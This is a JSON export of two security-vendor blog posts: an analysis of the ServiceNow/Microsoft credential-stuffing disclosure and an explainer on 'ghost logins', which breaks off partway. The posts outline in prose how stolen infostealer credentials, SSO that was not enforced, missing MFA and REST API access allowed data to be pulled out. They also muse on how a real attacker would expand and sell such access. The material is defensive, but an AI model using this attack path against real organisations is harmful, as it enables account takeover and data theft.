IdPs",{"url":184106},"https://images.ctfassets.net/y1cdw1ablpvd/3fPWMDLgVomv5ePNfVRJl1/fb870e9bfef9d402791086c3ce01f8fb/ServiceNow_Attack_Path__2_.png",{"items":184108},[184109,184111],{"sys":184110,"name":505},{"id":504},{"sys":184112,"name":509},{"id":508},{"items":184114},[184115,184634,185462],{"__typename":1528,"sys":184116,"content":184118,"title":184620,"synopsis":184621,"hashTags":118,"publishedDate":184622,"slug":184623,"tagsCollection":184624,"authorsCollection":184630},{"id":184117},"3N6eBccHWWc3cZWTZsaJVV",{"json":184119},{"nodeType":165,"data":184120,"content":184121},{},[184122,184151,184171,184178,184185,184188,184196,184203,184228,184235,184241,184248,184255,184288,184291,184299,184306,184326,184329,184337,184344,184351,184356,184374,184377,184385,184402,184409,184416,184436,184439,184446,184453,184460,184467,184470,184478,184485,184505,184512,184519,184526,184533,184540,184543,184551,184558,184601],{"nodeType":178,"data":184123,"content":184124},{},[184125,184129,184136,184140,184147],{"nodeType":173,"value":184126,"marks":184127,"data":184128},"We’ve been shouting about the risk posed by account takeover attacks on third party apps since we first released the ",[],{},{"nodeType":186,"data":184130,"content":184131},{"uri":88239},[184132],{"nodeType":173,"value":88742,"marks":184133,"data":184135},[184134],{"type":194},{},{"nodeType":173,"value":184137,"marks":184138,"data":184139}," in early 2023. 18 months later (and with some encouragement from the success of the ",[],{},{"nodeType":186,"data":184141,"content":184142},{"uri":74621},[184143],{"nodeType":173,"value":126005,"marks":184144,"data":184146},[184145],{"type":194},{},{"nodeType":173,"value":184148,"marks":184149,"data":184150},") it feels like the security community has woken up to the risk — and attackers likewise have sensed the opportunity. ",[],{},{"nodeType":178,"data":184152,"content":184153},{},[184154,184158,184167],{"nodeType":173,"value":184155,"marks":184156,"data":184157},"Last week, it emerged that ",[],{},{"nodeType":186,"data":184159,"content":184161},{"uri":184160},"https://medium.com/@moblig/how-i-accessed-microsofts-servicenow-exposing-all-microsoft-employee-emails-chat-support-5f8d535eb63b",[184162],{"nodeType":173,"value":184163,"marks":184164,"data":184166},"bug bounty hunters were able to use stolen credentials from a TI platform to Microsoft’s ServiceNow tenant",[184165],{"type":194},{},{"nodeType":173,"value":184168,"marks":184169,"data":184170},", accessing 1,000s of support ticket descriptions and attachments, and 250k+ employee emails. ",[],{},{"nodeType":178,"data":184172,"content":184173},{},[184174],{"nodeType":173,"value":184175,"marks":184176,"data":184177},"But this isn’t specifically a Microsoft problem. The researcher could have picked from a long list of potential targets. If even Microsoft with their vast security resources can be caught off guard by this, what chance do other organizations have? If anything, it illustrates the scale of the challenge facing organizations when it comes to securing their identity surface. ",[],{},{"nodeType":178,"data":184179,"content":184180},{},[184181],{"nodeType":173,"value":184182,"marks":184183,"data":184184},"Let’s take a closer look at what we can learn from this attack — and what it tells us about the direction that identity attacks are (rapidly) heading in. ",[],{},{"nodeType":231,"data":184186,"content":184187},{},[],{"nodeType":169,"data":184189,"content":184190},{},[184191],{"nodeType":173,"value":184192,"marks":184193,"data":184195},"Taking over ServiceNow accounts through credential stuffing (via infostealers)",[184194],{"type":370},{},{"nodeType":178,"data":184197,"content":184198},{},[184199],{"nodeType":173,"value":184200,"marks":184201,"data":184202},"A bug bounty hunter was able to compromise Microsoft’s ServiceNow account using stolen credentials from historical infostealer infections, found using a commercial TI feed. ",[],{},{"nodeType":178,"data":184204,"content":184205},{},[184206,184210,184215,184219,184224],{"nodeType":173,"value":184207,"marks":184208,"data":184209},"The researcher was able to enumerate a login page for Microsoft at ",[],{},{"nodeType":173,"value":184211,"marks":184212,"data":184214},"microsoft.servicenow.com/login.do",[184213],{"type":194},{},{"nodeType":173,"value":184216,"marks":184217,"data":184218},", with the /login.do meaning that ",[],{},{"nodeType":173,"value":184220,"marks":184221,"data":184223},"SSO was enabled but not enforced",[184222],{"type":370},{},{"nodeType":173,"value":184225,"marks":184226,"data":184227},". At this point, the attacker was able to authenticate using the stolen credentials only (as the target account lacked MFA).",[],{},{"nodeType":178,"data":184229,"content":184230},{},[184231],{"nodeType":173,"value":184232,"marks":184233,"data":184234},"After logging in they were presented with a blank UI. However, because they now had an authenticated session, they were able to switch to the REST API, and subsequently access two key endpoints through which they were able to collect and exfiltrate sensitive data including 1,000s of support ticket attachments, over 250,000+ employee emails, and an xlsx file with historical ticket submissions to the MSRC team. ",[],{},{"nodeType":312,"data":184236,"content":184240},{"target":184237},{"sys":184238},{"id":184239,"type":317,"linkType":318},"1Q2cL7mJhQUx1it0tU3MhJ",[],{"nodeType":178,"data":184242,"content":184243},{},[184244],{"nodeType":173,"value":184245,"marks":184246,"data":184247},"Naturally, at this point the researcher ended their attack and sought out a bounty for their efforts. ",[],{},{"nodeType":178,"data":184249,"content":184250},{},[184251],{"nodeType":173,"value":184252,"marks":184253,"data":184254},"But a real attacker wouldn’t have stopped there. Immediately, you’d be thinking:",[],{},{"nodeType":250,"data":184256,"content":184257},{},[184258,184268,184278],{"nodeType":254,"data":184259,"content":184260},{},[184261],{"nodeType":178,"data":184262,"content":184263},{},[184264],{"nodeType":173,"value":184265,"marks":184266,"data":184267},"How many other organizations are likely impacted by this issue? Are there other credentials that correspond with these exposed login pages available online? ",[],{},{"nodeType":254,"data":184269,"content":184270},{},[184271],{"nodeType":178,"data":184272,"content":184273},{},[184274],{"nodeType":173,"value":184275,"marks":184276,"data":184277},"Are there any ways that I could turn this access into a privileged account takeover? Would I be able to access even more information that way? ",[],{},{"nodeType":254,"data":184279,"content":184280},{},[184281],{"nodeType":178,"data":184282,"content":184283},{},[184284],{"nodeType":173,"value":184285,"marks":184286,"data":184287},"How could this data be used to conduct further attacks? Would other criminal groups pay me for this information if I don’t want to do this myself? ",[],{},{"nodeType":231,"data":184289,"content":184290},{},[],{"nodeType":169,"data":184292,"content":184293},{},[184294],{"nodeType":173,"value":184295,"marks":184296,"data":184298},"This isn’t just a Microsoft problem",[184297],{"type":370},{},{"nodeType":178,"data":184300,"content":184301},{},[184302],{"nodeType":173,"value":184303,"marks":184304,"data":184305},"It seems unlikely that only Microsoft is affected here. Other ServiceNow tenants could have been taken over using the same approach. Other company credentials could be (will be) available online.",[],{},{"nodeType":178,"data":184307,"content":184308},{},[184309,184313,184322],{"nodeType":173,"value":184310,"marks":184311,"data":184312},"Using straightforward ",[],{},{"nodeType":186,"data":184314,"content":184316},{"uri":184315},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/subdomain_tenant_discovery/description.md",[184317],{"nodeType":173,"value":184318,"marks":184319,"data":184321},"tenant enumeration techniques",[184320],{"type":194},{},{"nodeType":173,"value":184323,"marks":184324,"data":184325}," and the list of ServiceNow named customers, it’s very easy to identify different customer tenants. And spending a few minutes using the same credential feed as the researcher, I found multiple organizations with many more breached credentials available linked to the same login.do page. ",[],{},{"nodeType":231,"data":184327,"content":184328},{},[],{"nodeType":169,"data":184330,"content":184331},{},[184332],{"nodeType":173,"value":184333,"marks":184334,"data":184336},"Similarities with Snowflake",[184335],{"type":370},{},{"nodeType":178,"data":184338,"content":184339},{},[184340],{"nodeType":173,"value":184341,"marks":184342,"data":184343},"There are no prizes for connecting this attack path with the infamous attacks on Snowflake customers earlier this year, which resulted in 165+ victims, and hundreds of millions of breached customer records. ",[],{},{"nodeType":178,"data":184345,"content":184346},{},[184347],{"nodeType":173,"value":184348,"marks":184349,"data":184350},"The Snowflake attack path was startlingly similar, and gives us a feel for what this attack could have turned into if conducted by a real attacker. ",[],{},{"nodeType":312,"data":184352,"content":184355},{"target":184353},{"sys":184354},{"id":4290,"type":317,"linkType":318},[],{"nodeType":178,"data":184357,"content":184358},{},[184359,184363,184371],{"nodeType":173,"value":184360,"marks":184361,"data":184362},"Both attacks began with stolen credentials breached in historical infostealer infections. In Snowflake’s case, 80% of the credentials used were connected to infostealer infections dating back to 2020, ",[],{},{"nodeType":186,"data":184364,"content":184365},{"uri":4057},[184366],{"nodeType":173,"value":184367,"marks":184368,"data":184370},"according to Mandiant",[184369],{"type":194},{},{"nodeType":173,"value":197,"marks":184372,"data":184373},[],{},{"nodeType":231,"data":184375,"content":184376},{},[],{"nodeType":169,"data":184378,"content":184379},{},[184380],{"nodeType":173,"value":184381,"marks":184382,"data":184384},"Ghost logins strike again",[184383],{"type":370},{},{"nodeType":178,"data":184386,"content":184387},{},[184388,184391,184398],{"nodeType":173,"value":37,"marks":184389,"data":184390},[],{},{"nodeType":186,"data":184392,"content":184393},{"uri":4342},[184394],{"nodeType":173,"value":26529,"marks":184395,"data":184397},[184396],{"type":194},{},{"nodeType":173,"value":184399,"marks":184400,"data":184401}," are one of the leading factors in successful credential stuffing attacks. Simply put, ghost logins are often-forgotten local logins that are tricky for security teams to manage and secure.  ",[],{},{"nodeType":178,"data":184403,"content":184404},{},[184405],{"nodeType":173,"value":184406,"marks":184407,"data":184408},"Ghost logins are a problem for security teams because they often lack best practice security configurations, with things like weak, previously breached, and reused passwords — and no MFA. ",[],{},{"nodeType":178,"data":184410,"content":184411},{},[184412],{"nodeType":173,"value":184413,"marks":184414,"data":184415},"Many organizations think that by migrating an app to use SSO, where they’ve enforced MFA at the IdP level, it’s job done. However, this usually doesn’t eliminate previously created local accounts, meaning they need to be manually unset. But because organizations often lack app-level visibility of account configuration and login methods (it’s simply not provided by most app vendors) these accounts can fly under the radar for extended periods — often until situations like this when they are compromised. ",[],{},{"nodeType":178,"data":184417,"content":184418},{},[184419,184423,184432],{"nodeType":173,"value":184420,"marks":184421,"data":184422},"Ghost logins were a particular problem in the Snowflake attacks because MFA could not be globally enforced at the time of the incident. This meant that local accounts would need to be manually unset using the SQL interface — which unhelpfully ",[],{},{"nodeType":186,"data":184424,"content":184426},{"uri":184425},"https://pushsecurity.com/resources/video/demonstrating-ghost-logins-in-snowflake-and-how-to-remediate-them/",[184427],{"nodeType":173,"value":184428,"marks":184429,"data":184431},"provided inaccurate information about the account status and took extended periods of time to update",[184430],{"type":194},{},{"nodeType":173,"value":184433,"marks":184434,"data":184435}," after a change had been made, creating uncertainty and confusion for responders. But this is just one example of many illustrating how difficult in-app identity management can be. ",[],{},{"nodeType":231,"data":184437,"content":184438},{},[],{"nodeType":169,"data":184440,"content":184441},{},[184442],{"nodeType":173,"value":144122,"marks":184443,"data":184445},[184444],{"type":370},{},{"nodeType":178,"data":184447,"content":184448},{},[184449],{"nodeType":173,"value":184450,"marks":184451,"data":184452},"If we hadn’t realized it yet, attacks targeting third-party business apps are everywhere. It’s not just the flavor of the month — it’s here to stay. ",[],{},{"nodeType":178,"data":184454,"content":184455},{},[184456],{"nodeType":173,"value":184457,"marks":184458,"data":184459},"This is because it’s so easy for attackers to monetize these compromises. Log into app > dump data > profit. ",[],{},{"nodeType":178,"data":184461,"content":184462},{},[184463],{"nodeType":173,"value":184464,"marks":184465,"data":184466},"And the easiest way to achieve this isn’t through complex software exploits, it’s through identity attacks. In the ServiceNow case, using public information (that was available to the security team too) to log into an app. It’s too easy.",[],{},{"nodeType":231,"data":184468,"content":184469},{},[],{"nodeType":169,"data":184471,"content":184472},{},[184473],{"nodeType":173,"value":184474,"marks":184475,"data":184477},"Identity attacks are misunderstood",[184476],{"type":370},{},{"nodeType":178,"data":184479,"content":184480},{},[184481],{"nodeType":173,"value":184482,"marks":184483,"data":184484},"The researcher notes that, despite the severity of the bug, it wasn’t paid out under the MSRC bug bounty scheme. And while this is perhaps not a classic software exploit, you can’t argue about the risk it poses. This is just as impactful as any classic vulnerability, if not more so — because the technical barrier to entry is so much lower. ",[],{},{"nodeType":178,"data":184486,"content":184487},{},[184488,184492,184501],{"nodeType":173,"value":184489,"marks":184490,"data":184491},"Pat Gray of the Risky Biz podcast ",[],{},{"nodeType":186,"data":184493,"content":184495},{"uri":184494},"https://risky.biz/RB766/",[184496],{"nodeType":173,"value":184497,"marks":184498,"data":184500},"said of another recent disclosure",[184499],{"type":194},{},{"nodeType":173,"value":184502,"marks":184503,"data":184504},", where a 15 year-old researcher was able to turn a Zendesk ‘feature’ into hijacking Apple SSO to log into downstream SaaS, that there’s a lack of imagination in understanding how these third-party apps can be abused by an attacker. I’d tend to agree here.",[],{},{"nodeType":178,"data":184506,"content":184507},{},[184508],{"nodeType":173,"value":184509,"marks":184510,"data":184511},"Part of the challenge here is perhaps a lack of awareness of just how severe these issues are. Certainly in the Zendesk case, the initial disclosure (email spoofing) was thrown out, but when it was demonstrated that it could be used to take over downstream apps like Slack, affected companies were happy to pay up, and Zendesk (via HackerOne) got back in touch. ",[],{},{"nodeType":178,"data":184513,"content":184514},{},[184515],{"nodeType":173,"value":184516,"marks":184517,"data":184518},"If I were the researcher, I would have considered reporting this issue to ServiceNow too, not just Microsoft — as it undoubtedly affects many organizations. Yes, the fact that Microsoft credentials were accessible online is a Microsoft problem, but given the potential spread of organizations also susceptible to this attack, does the vendor not have a responsibility to help mitigate these attacks? I would hope that ServiceNow have contacted their customers to be cautious of experiencing an increase in credential stuffing attacks in the near future at the very least. ",[],{},{"nodeType":178,"data":184520,"content":184521},{},[184522],{"nodeType":173,"value":184523,"marks":184524,"data":184525},"There’s clearly a need for better security-by-default from SaaS vendors — things like mandatory MFA enforcement would be a good start. Because there are simply too many apps, and too many accounts to manage — and no effective centralized way of managing them across your SaaS inventory. ",[],{},{"nodeType":178,"data":184527,"content":184528},{},[184529],{"nodeType":173,"value":184530,"marks":184531,"data":184532},"It makes you wonder how many other apps are impacted by ‘on by default’ configurations that can be abused in ways we just don’t know about yet. Partly because nobody is really looking — bug bounties aren’t being paid out, and I know of only a handful of forward-thinking security consultancies conducting any real offensive security testing with their clients in this space. ",[],{},{"nodeType":178,"data":184534,"content":184535},{},[184536],{"nodeType":173,"value":184537,"marks":184538,"data":184539},"We are also reminded, again and again, that credential stuffing attacks are as effective as ever. Despite the investment in SSO, MFA, and all of the identity management and hygiene tools that organizations have nowadays, attackers and researchers keep finding gaps.  ",[],{},{"nodeType":231,"data":184541,"content":184542},{},[],{"nodeType":169,"data":184544,"content":184545},{},[184546],{"nodeType":173,"value":184547,"marks":184548,"data":184550},"What can you do about it? ",[184549],{"type":370},{},{"nodeType":178,"data":184552,"content":184553},{},[184554],{"nodeType":173,"value":184555,"marks":184556,"data":184557},"The most important step is to acknowledge the severity of the threat — and the ways that expected controls are failing.",[],{},{"nodeType":250,"data":184559,"content":184560},{},[184561,184571,184581,184591],{"nodeType":254,"data":184562,"content":184563},{},[184564],{"nodeType":178,"data":184565,"content":184566},{},[184567],{"nodeType":173,"value":184568,"marks":184569,"data":184570},"There will almost always be gaps in any organization’s identity security perimeter, simply because it’s almost impossible to have the required visibility — even if you’re Microsoft with your vast security resources.",[],{},{"nodeType":254,"data":184572,"content":184573},{},[184574],{"nodeType":178,"data":184575,"content":184576},{},[184577],{"nodeType":173,"value":184578,"marks":184579,"data":184580},"There will always be ways to abuse app features and configurations, and we’ve barely begun to scratch the surface of what’s now possible in the world of connected SaaS.",[],{},{"nodeType":254,"data":184582,"content":184583},{},[184584],{"nodeType":178,"data":184585,"content":184586},{},[184587],{"nodeType":173,"value":184588,"marks":184589,"data":184590},"These attacks are very difficult to intercept once an attacker is active inside an app, because there’s very little meaningful visibility. ",[],{},{"nodeType":254,"data":184592,"content":184593},{},[184594],{"nodeType":178,"data":184595,"content":184596},{},[184597],{"nodeType":173,"value":184598,"marks":184599,"data":184600},"Once they’re inside, the attack can be over incredibly quickly, and can be repeated across app tenants for maximum impact (again, just look at Snowflake). ",[],{},{"nodeType":178,"data":184602,"content":184603},{},[184604,184608,184616],{"nodeType":173,"value":184605,"marks":184606,"data":184607},"At Push, we’re focused primarily on detecting and intercepting account takeover for these reasons — it’s your earliest opportunity, and for many attacks it’s also your last. If you want to learn more, ",[],{},{"nodeType":186,"data":184609,"content":184610},{"uri":81621},[184611],{"nodeType":173,"value":184612,"marks":184613,"data":184615},"check out our recent design philosophy blog",[184614],{"type":194},{},{"nodeType":173,"value":184617,"marks":184618,"data":184619}," discussing why we’re shifting detection left to focus on account takeover.  ",[],{},"What we can learn from the recent ServiceNow/Microsoft disclosure","Account takeover on third-party apps is the flavor of the month for security researchers — what can we learn from it? ","2024-11-01T00:00:00.000Z","learning-from-the-servicenow-disclosure",{"items":184625},[184626,184628],{"sys":184627,"name":505},{"id":504},{"sys":184629,"name":26137},{"id":26136},{"items":184631},[184632],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":184633},{"url":1496},{"__typename":1528,"sys":184635,"content":184636,"title":173142,"synopsis":185450,"hashTags":118,"publishedDate":185451,"slug":173143,"tagsCollection":185452,"authorsCollection":185458},{"id":156725},{"json":184637},{"nodeType":165,"data":184638,"content":184639},{},[184640,184647,184654,184661,184690,184697,184704,184721,184728,184735,184753,184760,184767,184774,184780,184787,184830,184837,184844,184851,184874,184881,184888,184895,184943,184950,184957,184964,184971,184983,184990,184998,185005,185038,185045,185052,185059,185066,185127,185135,185142,185149,185183,185190,185198,185205,185212,185224,185240,185269,185287,185294,185311,185318,185325,185342,185349,185356,185363,185396,185403,185421,185438,185444],{"nodeType":178,"data":184641,"content":184642},{},[184643],{"nodeType":173,"value":184644,"marks":184645,"data":184646},"Identity attacks like phishing, credential stuffing, and session hijacking are now the leading cause of cyber security breaches, as attackers shift their attention to the sprawl of third-party applications and services that has become the backbone of business IT. ",[],{},{"nodeType":178,"data":184648,"content":184649},{},[184650],{"nodeType":173,"value":184651,"marks":184652,"data":184653},"The attacker’s goal in these attacks is account takeover: logging into a user account to access your company app tenant. From there, the attacker can usually achieve all of their objectives from inside the compromised app, usually involving dumping sensitive data with which to hold the company to ransom, or selling the data on underground criminal marketplaces. ",[],{},{"nodeType":178,"data":184655,"content":184656},{},[184657],{"nodeType":173,"value":184658,"marks":184659,"data":184660},"These attack techniques have been commonplace for over a decade — but the shift in attack context away from attacking endpoints (user devices and servers) to cloud services is seeing something of an identity attack renaissance. ",[],{},{"nodeType":178,"data":184662,"content":184663},{},[184664,184667,184674,184678,184686],{"nodeType":173,"value":37,"marks":184665,"data":184666},[],{},{"nodeType":186,"data":184668,"content":184669},{"uri":832},[184670],{"nodeType":173,"value":26529,"marks":184671,"data":184673},[184672],{"type":194},{},{"nodeType":173,"value":184675,"marks":184676,"data":184677}," are one of the leading factors in successful ",[],{},{"nodeType":186,"data":184679,"content":184681},{"uri":184680},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/credential_stuffing/description.md",[184682],{"nodeType":173,"value":182807,"marks":184683,"data":184685},[184684],{"type":194},{},{"nodeType":173,"value":184687,"marks":184688,"data":184689}," attacks driving account takeover.",[],{},{"nodeType":169,"data":184691,"content":184692},{},[184693],{"nodeType":173,"value":184694,"marks":184695,"data":184696},"Ghost logins 101",[],{},{"nodeType":178,"data":184698,"content":184699},{},[184700],{"nodeType":173,"value":184701,"marks":184702,"data":184703},"Simply put, ghost logins are often-forgotten alternative login methods that are tricky for security teams to manage and secure — because they don’t know about them. Because of this, they’re likely to possess weak configurations that make them susceptible to account takeover attacks. ",[],{},{"nodeType":178,"data":184705,"content":184706},{},[184707,184711,184718],{"nodeType":173,"value":184708,"marks":184709,"data":184710},"We found that ",[],{},{"nodeType":186,"data":184712,"content":184713},{"uri":4492},[184714],{"nodeType":173,"value":184715,"marks":184716,"data":184717},"ghost logins are present in ~10% of the accounts per organization",[],{},{"nodeType":173,"value":2340,"marks":184719,"data":184720},[],{},{"nodeType":235,"data":184722,"content":184723},{},[184724],{"nodeType":173,"value":184725,"marks":184726,"data":184727},"Why do ghost logins exist?",[],{},{"nodeType":178,"data":184729,"content":184730},{},[184731],{"nodeType":173,"value":184732,"marks":184733,"data":184734},"Identity management used to be something that was centrally contained and managed using an enterprise identity service like Active Directory. Most users probably only had one or two identities that you really cared about: the one they used to log into their company laptop and domain, and maybe also to log into a VPN. ",[],{},{"nodeType":178,"data":184736,"content":184737},{},[184738,184742,184749],{"nodeType":173,"value":184739,"marks":184740,"data":184741},"Now, there are ",[],{},{"nodeType":186,"data":184743,"content":184744},{"uri":4492},[184745],{"nodeType":173,"value":184746,"marks":184747,"data":184748},"200+ business apps in use per company, creating 1000s of sprawled identities",[],{},{"nodeType":173,"value":184750,"marks":184751,"data":184752}," across an ecosystem of business apps and services accessed over the internet.",[],{},{"nodeType":178,"data":184754,"content":184755},{},[184756],{"nodeType":173,"value":184757,"marks":184758,"data":184759},"Most businesses have tried to solve this problem with single sign on (SSO). The logic being that if you can use a single set of credentials (and therefore, a single identity) to access all of your business apps, and then secure those credentials with MFA, then this problem goes away. However…",[],{},{"nodeType":235,"data":184761,"content":184762},{},[184763],{"nodeType":173,"value":184764,"marks":184765,"data":184766},"SSO expectations versus reality",[],{},{"nodeType":178,"data":184768,"content":184769},{},[184770],{"nodeType":173,"value":184771,"marks":184772,"data":184773},"Unfortunately, the reality of SSO implementation is flawed. Most apps accept multiple login methods that can be configured — and used — simultaneously (yes, most apps don’t have proper session controls).  ",[],{},{"nodeType":312,"data":184775,"content":184779},{"target":184776},{"sys":184777},{"id":184778,"type":317,"linkType":318},"3sOz3HkiyJpY9nFtGCWEOV",[],{"nodeType":178,"data":184781,"content":184782},{},[184783],{"nodeType":173,"value":184784,"marks":184785,"data":184786},"This is made worse by the fact that:",[],{},{"nodeType":250,"data":184788,"content":184789},{},[184790,184800,184810,184820],{"nodeType":254,"data":184791,"content":184792},{},[184793],{"nodeType":178,"data":184794,"content":184795},{},[184796],{"nodeType":173,"value":184797,"marks":184798,"data":184799},"Most apps can't be locked down to restrict which login methods are accepted.",[],{},{"nodeType":254,"data":184801,"content":184802},{},[184803],{"nodeType":178,"data":184804,"content":184805},{},[184806],{"nodeType":173,"value":184807,"marks":184808,"data":184809},"Users often self-adopt apps, and default to a username and password (and typically miss out MFA). ",[],{},{"nodeType":254,"data":184811,"content":184812},{},[184813],{"nodeType":178,"data":184814,"content":184815},{},[184816],{"nodeType":173,"value":184817,"marks":184818,"data":184819},"SSO isn’t always possible if you aren’t using a supported IdP — and only one in three apps support SAML, the preferred enterprise-grade protocol.",[],{},{"nodeType":254,"data":184821,"content":184822},{},[184823],{"nodeType":178,"data":184824,"content":184825},{},[184826],{"nodeType":173,"value":184827,"marks":184828,"data":184829},"Even where SSO is possible, configuring an app for SSO doesn't automatically delete any legacy local logins.",[],{},{"nodeType":178,"data":184831,"content":184832},{},[184833],{"nodeType":173,"value":184834,"marks":184835,"data":184836},"Inevitably, this means that there are many situations in which users will create local accounts — typically with a username and password, and without MFA. This is how ghost logins are born.",[],{},{"nodeType":235,"data":184838,"content":184839},{},[184840],{"nodeType":173,"value":184841,"marks":184842,"data":184843},"How are ghost logins created? ",[],{},{"nodeType":178,"data":184845,"content":184846},{},[184847],{"nodeType":173,"value":184848,"marks":184849,"data":184850},"Ghost logins can be created in the following ways:",[],{},{"nodeType":250,"data":184852,"content":184853},{},[184854,184864],{"nodeType":254,"data":184855,"content":184856},{},[184857],{"nodeType":178,"data":184858,"content":184859},{},[184860],{"nodeType":173,"value":184861,"marks":184862,"data":184863},"A user self-adopts an app, setting up an account with a local username and password. The app is later adopted companywide and brought under SSO. This creates an additional SSO login method, likely as the default, but the local login will continue to exist unless explicitly disabled or deleted. ",[],{},{"nodeType":254,"data":184865,"content":184866},{},[184867],{"nodeType":178,"data":184868,"content":184869},{},[184870],{"nodeType":173,"value":184871,"marks":184872,"data":184873},"Secondary/backup login methods can often be added later in the app settings after logging in. This includes things like setting up a secondary email to send a login link to, or setting up API access to remove the need to authenticate altogether. ",[],{},{"nodeType":178,"data":184875,"content":184876},{},[184877],{"nodeType":173,"value":184878,"marks":184879,"data":184880},"So, ghost logins are very easily introduced through the normal course of app adoption and use by employees. ",[],{},{"nodeType":235,"data":184882,"content":184883},{},[184884],{"nodeType":173,"value":184885,"marks":184886,"data":184887},"Why do ghost logins pose a risk? ",[],{},{"nodeType":178,"data":184889,"content":184890},{},[184891],{"nodeType":173,"value":184892,"marks":184893,"data":184894},"Ghost logins pose a risk for a number of reasons, as they: ",[],{},{"nodeType":250,"data":184896,"content":184897},{},[184898,184913,184928],{"nodeType":254,"data":184899,"content":184900},{},[184901],{"nodeType":178,"data":184902,"content":184903},{},[184904,184909],{"nodeType":173,"value":184905,"marks":184906,"data":184908},"Typically have less secure configurations ",[184907],{"type":370},{},{"nodeType":173,"value":184910,"marks":184911,"data":184912},"than your preferred login method – and may be missing key controls like MFA.  ",[],{},{"nodeType":254,"data":184914,"content":184915},{},[184916],{"nodeType":178,"data":184917,"content":184918},{},[184919,184924],{"nodeType":173,"value":184920,"marks":184921,"data":184923},"Are effectively shadow logins",[184922],{"type":370},{},{"nodeType":173,"value":184925,"marks":184926,"data":184927}," – IT/security don’t know about them, and if using an IdP as your primary identity security interface, they won’t necessarily be visible without taking a deeper look at individual apps. ",[],{},{"nodeType":254,"data":184929,"content":184930},{},[184931],{"nodeType":178,"data":184932,"content":184933},{},[184934,184939],{"nodeType":173,"value":184935,"marks":184936,"data":184938},"Can be used simultaneously with SSO",[184937],{"type":370},{},{"nodeType":173,"value":184940,"marks":184941,"data":184942}," – so you can have an unrestricted number of concurrent sessions with SSO and non SSO logins active at the same time, without the user being kicked out of the previous session.",[],{},{"nodeType":178,"data":184944,"content":184945},{},[184946],{"nodeType":173,"value":184947,"marks":184948,"data":184949},"Ghost logins provide opportunities for attackers to bypass security controls for initial access and persistence in an application (which we’ll come onto in more detail later). They also provide an opportunity for malicious insiders, e.g. a disgruntled employee, to access systems even after SSO access is revoked. If the security team relies on IdP logs to audit app logins, these accounts can go undetected.",[],{},{"nodeType":178,"data":184951,"content":184952},{},[184953],{"nodeType":173,"value":184954,"marks":184955,"data":184956},"To be able to identify them, you’d need to log into the app admin dashboard. But depending on how the app was adopted, you (as a security admin) may not even be an app-level admin — it’s not unusual for individual teams to administer their own apps. And even if you do have access, it’s not always easy (or possible) to gather this level of information about user account configuration. ",[],{},{"nodeType":178,"data":184958,"content":184959},{},[184960],{"nodeType":173,"value":184961,"marks":184962,"data":184963},"It’s very easy to see how these vulnerable login methods can be overlooked by security teams – let’s look at how they can be identified and exploited by attackers. ",[],{},{"nodeType":169,"data":184965,"content":184966},{},[184967],{"nodeType":173,"value":184968,"marks":184969,"data":184970},"How can ghost logins be exploited by attackers?",[],{},{"nodeType":178,"data":184972,"content":184973},{},[184974,184979],{"nodeType":173,"value":184975,"marks":184976,"data":184978},"Let’s take an example scenario:",[184977],{"type":370},{},{"nodeType":173,"value":184980,"marks":184981,"data":184982}," You’re using an IdP solution like Okta or Microsoft/Entra with SAML SSO as the default login method for your core business apps. Via your IdP you require MFA when authenticating to your IdP apps page, and also potentially when signing into an individual connected app. ",[],{},{"nodeType":178,"data":184984,"content":184985},{},[184986],{"nodeType":173,"value":184987,"marks":184988,"data":184989},"However, you only recently introduced your IdP solution, and your users previously accessed this app with a local username and password. Although you asked your users to configure MFA in the app itself, not all of them did. And when you deployed your IdP solution, you didn’t manually unset all the local password-based logins for the apps you connected to it. ",[],{},{"nodeType":178,"data":184991,"content":184992},{},[184993],{"nodeType":173,"value":184994,"marks":184995,"data":184997},"Unknown to you, there are now hundreds of local accounts for core business apps which lack MFA. ",[184996],{"type":370},{},{"nodeType":178,"data":184999,"content":185000},{},[185001],{"nodeType":173,"value":185002,"marks":185003,"data":185004},"There are two main scenarios in which ghost logins can be utilized by an attacker:",[],{},{"nodeType":250,"data":185006,"content":185007},{},[185008,185023],{"nodeType":254,"data":185009,"content":185010},{},[185011],{"nodeType":178,"data":185012,"content":185013},{},[185014,185019],{"nodeType":173,"value":185015,"marks":185016,"data":185018},"To bypass robustly configured login methods",[185017],{"type":370},{},{"nodeType":173,"value":185020,"marks":185021,"data":185022}," such as SSO to compromise an app identity during the initial access phase of an attack. ",[],{},{"nodeType":254,"data":185024,"content":185025},{},[185026],{"nodeType":178,"data":185027,"content":185028},{},[185029,185034],{"nodeType":173,"value":185030,"marks":185031,"data":185033},"To create additional login methods for an already compromised account to ensure persistent access",[185032],{"type":370},{},{"nodeType":173,"value":185035,"marks":185036,"data":185037}," – even if the original compromised login method is revoked or disabled. This could be either the result of compromising an identity belonging to a specific app, or having previously compromised an IdP account (e.g. Okta).",[],{},{"nodeType":178,"data":185039,"content":185040},{},[185041],{"nodeType":173,"value":185042,"marks":185043,"data":185044},"Let's look at these use cases in more detail. ",[],{},{"nodeType":235,"data":185046,"content":185047},{},[185048],{"nodeType":173,"value":185049,"marks":185050,"data":185051},"Ghost logins for initial access",[],{},{"nodeType":178,"data":185053,"content":185054},{},[185055],{"nodeType":173,"value":185056,"marks":185057,"data":185058},"Arguably the most dangerous use case for ghost logins is to conduct credential attacks against accounts using a username and password. Logins with a weak or guessable password, or a reused password that has appeared in a public data breach dump, are primed for account takeover. ",[],{},{"nodeType":178,"data":185060,"content":185061},{},[185062],{"nodeType":173,"value":185063,"marks":185064,"data":185065},"The cyber crime ecosystem is leaning toward the theft, sale, and use of stolen credentials (not just emails and passwords, but session tokens too). ",[],{},{"nodeType":250,"data":185067,"content":185068},{},[185069,185089,185108],{"nodeType":254,"data":185070,"content":185071},{},[185072],{"nodeType":178,"data":185073,"content":185074},{},[185075,185079,185086],{"nodeType":173,"value":185076,"marks":185077,"data":185078},"There are 600 million identity attacks per day, with 99% involving passwords 